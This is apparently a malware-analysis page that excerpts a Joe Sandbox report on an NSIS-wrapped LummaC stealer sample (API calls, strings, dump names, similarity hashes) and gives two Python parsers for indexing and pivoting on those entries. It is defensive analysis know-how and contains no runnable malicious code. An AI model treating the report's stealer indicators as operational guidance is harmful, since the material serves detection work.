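SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
# One APIs bullet: optional 'Part of subcall function XXXXXXXX:' prefix, Name.MODULE, an
# optional '(args)' list (absent on lines like 'wsprintfW.USER32 ref: 00404483'), then ref.
API_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})"
)
STRING_RE = re.compile(r"(?P<text>.*), xrefs: (?P<ref>[0-9A-F]{8})")

# Constructed sample: two records copied in the shape of this page's listing
SAMPLE = r"""
APIs
  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
• RegCloseKey.ADVAPI32(00000000), ref: 0040282E
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
Strings
• DeleteRegKey: "%s\%s", xrefs: 00402843
• DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
Memory Dump Source
• Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: CloseDeleteOpenValuelstrlenwvsprintf
• String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
• API String ID: 1697273262-1764544995
• Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
• Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
APIs
• GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
• GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
• GlobalFree.KERNEL32(00000000), ref: 004063CA
Similarity
• API ID: Global$AddressAllocByteCharFreeMultiProcWide
• String ID:
• API String ID: 2883127279-0
• Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
• Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
"""


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)        # dicts: name, module, args, ref, subcall
    strings: list = field(default_factory=list)     # (text, xref) pairs
    source_file: str = ""                           # memory dump the function was lifted from
    similarity: dict = field(default_factory=dict)  # raw Similarity fields; API String ID as (int, int)


def parse_api_line(text):
    """Parse one APIs bullet (without the bullet); 'subcall' is the callee address when
    the API is only reached through a subcall, else None."""
    m = API_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unrecognised API line: {text!r}")
    args = m["args"].split(",") if m["args"] is not None else []
    return {"name": m["name"], "module": m["module"], "args": args,
            "ref": m["ref"], "subcall": m["sub"]}


def parse_records(text):
    """Split the flattened listing into FunctionRecords; a record starts at each 'APIs' heading."""
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                records.append(FunctionRecord())
            section = line
            continue
        if not records:  # bullet before the first record heading: nothing to attach it to
            continue
        item, rec = line.lstrip("• ").strip(), records[-1]
        if section == "APIs":
            rec.apis.append(parse_api_line(item))
        elif section == "Strings":
            m = STRING_RE.fullmatch(item)
            rec.strings.append((m["text"], m["ref"]))
        elif section == "Memory Dump Source" and item.startswith("Source File: "):
            rec.source_file = item[len("Source File: "):].split(", ")[0]
        elif section == "Similarity":
            key, _, value = item.partition(":")
            value = value.strip()
            if key == "API String ID":  # two decimal hashes joined by '-'
                value = tuple(int(part) for part in value.split("-"))
            rec.similarity[key] = value
    return records


TAG_RULES = {  # this example's own rule table; extend it for the APIs you hunt
    "registry": ("RegOpenKey", "RegCloseKey", "RegDeleteValue", "RegDeleteKey", "RegSetValue"),
    "filesystem": ("CreateFile", "FindFirstFile", "SHFileOperation", "DeleteFile", "CopyFile"),
    "dynamic-import": ("GetProcAddress", "LoadLibrary"),
}


def classify(rec, include_subcalls=True):
    """Coarse triage tags from the API names a function reaches."""
    tags = set()
    for api in rec.apis:
        if api["subcall"] and not include_subcalls:
            continue
        for tag, prefixes in TAG_RULES.items():
            if api["name"].startswith(prefixes):
                tags.add(tag)
    return tags


def index_by(records, key="Opcode ID"):
    """Map a Similarity hash to the records carrying it, for pivoting across reports."""
    index = {}
    for rec in records:
        index.setdefault(rec.similarity.get(key, ""), []).append(rec)
    return index


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.apis[0]["ref"], sorted(classify(rec)), rec.similarity["API String ID"])
```

Feed it the text of the listing (one report or many) and index on "Opcode ID" or "API String ID" to find the same function body in other submissions; `classify(rec, include_subcalls=False)` restricts the tags to APIs the function calls directly, which matters when a shared helper such as the `wvsprintfW` logger at 004062CF would otherwise tag every caller.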
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 0040492E
                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                        • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                        • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                        • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                        APIs
                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringlstrcmp
                                        • String ID: !N~
                                        • API String ID: 623250636-529124213
                                        • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                        • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                        • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                        • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                        APIs
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                        • CloseHandle.KERNEL32(?), ref: 00405C9D
                                        Strings
                                        • Error launching installer, xrefs: 00405C74
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 3712363035-66219284
                                        • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                        • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                        • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                        • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                        APIs
                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: CloseHandlelstrlenwvsprintf
                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                        • API String ID: 3509786178-2769509956
                                        • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                        • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                        • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                        • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                        • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                        • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                        • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                        • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                        • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4
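Every function entry in this report repeats one fixed layout: an APIs list with call-site addresses (and calls attributed to a subcall), Strings with their xrefs, the memory dump the function was lifted from, and the Similarity identifiers (API ID, API String ID, Opcode ID, Instruction ID and the two fuzzy hashes) that Joe Sandbox provides for pivoting between samples. Two things a practitioner should keep in mind when pivoting on the entries in this stretch: the strings "Error launching installer", "RMDir: RemoveDirectory invalid input("")" and "[Rename]", and the GetPrivateProfileStringW/lstrcmpW pair, are the standard NSIS installer stub, i.e. the wrapper that carries the LummaC payload rather than the stealer code itself, so their fuzzy hashes and API String IDs will also match benign NSIS installers; and the "Download File" text fused onto the Associated lines is link residue from the rendered page, not part of the dump name. The parser below is an added example written for this page, not Joe Sandbox tooling; SAMPLE is constructed from the entries above (one "Download File" suffix left in deliberately to show it being stripped), and the record and function names (FunctionEntry, ApiCall, parse_report, index_by, callers_of) are the example's own.

```python
"""Parse Joe Sandbox per-function entries (APIs / Strings / Memory Dump Source /
Similarity) into records an analyst can pivot on.  Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import Optional

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
RESIDUE = "Download File"  # link text fused onto "Associated:" lines by page extraction

# "Name.MODULE(arg,...), ref: ADDR", optionally prefixed by the subcall marker.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str                          # call-site address inside the dumped image
    subcall_of: Optional[str] = None  # callee address when Joe attributes the call to a subcall


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)     # (value, [xref addresses])
    source_file: Optional[str] = None
    base_offset: Optional[str] = None
    associated: list = field(default_factory=list)
    snapshot: Optional[str] = None
    similarity: dict = field(default_factory=dict)  # API ID, Opcode ID, fuzzy hashes, ...

    def api_names(self):
        return sorted({a.name for a in self.apis})


def parse_report(text):
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":            # every function entry opens with its API list
                cur = FunctionEntry()
                entries.append(cur)
            section = line
            continue
        if cur is None:                   # fragment before the first complete entry
            continue
        if line.startswith("•"):
            line = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] else []
                cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif section == "Strings":
            value, sep, xrefs = line.rpartition(", xrefs: ")
            if sep:
                cur.strings.append((value, xrefs.split(", ")))
        elif section == "Memory Dump Source":
            if line.startswith("Source File: "):
                src, _, rest = line[len("Source File: "):].partition(", Offset: ")
                cur.source_file, cur.base_offset = src, rest.partition(",")[0] or None
            elif line.startswith("Associated: "):
                cur.associated.append(line[len("Associated: "):].removesuffix(RESIDUE))
        elif section == "Joe Sandbox IDA Plugin":
            if line.startswith("Snapshot File: "):
                cur.snapshot = line[len("Snapshot File: "):]
        elif section == "Similarity":     # split on the first colon: values may contain ':'
            key, sep, val = line.partition(":")
            if sep:
                cur.similarity[key.strip()] = val.strip()
    return entries


def index_by(entries, key):
    """Group entries by one Similarity field, e.g. 'API String ID' or 'Instruction Fuzzy Hash'."""
    idx = {}
    for e in entries:
        if e.similarity.get(key):
            idx.setdefault(e.similarity[key], []).append(e)
    return idx


def callers_of(entries, api_name):
    """Direct call sites of api_name as (address, entry); subcall-attributed calls are excluded."""
    return [(a.ref, e) for e in entries for a in e.apis
            if a.name == api_name and a.subcall_of is None]


# Constructed from two entries on this page (NSIS Exec and RMDir stub routines).
SAMPLE = '''
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
• CloseHandle.KERNEL32(?), ref: 00405C9D
Strings
• Error launching installer, xrefs: 00405C74
Memory Dump Source
• Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
APIs
• lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
• wvsprintfW.USER32(00000000,?,?), ref: 004062F3
  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseHandlelstrlenwvsprintf
• String ID: RMDir: RemoveDirectory invalid input("")
• API String ID: 3509786178-2769509956
'''

if __name__ == "__main__":
    for e in parse_report(SAMPLE):
        print(e.similarity.get("API String ID"), e.api_names(), [s for s, _ in e.strings])
```

To pivot across several reports, feed the concatenated page text of each report to parse_report and merge the dictionaries from index_by on "Instruction Fuzzy Hash" or "API String ID"; callers_of gives the call-site addresses to jump to in the dump named in source_file (base_offset is the image base the addresses are relative to).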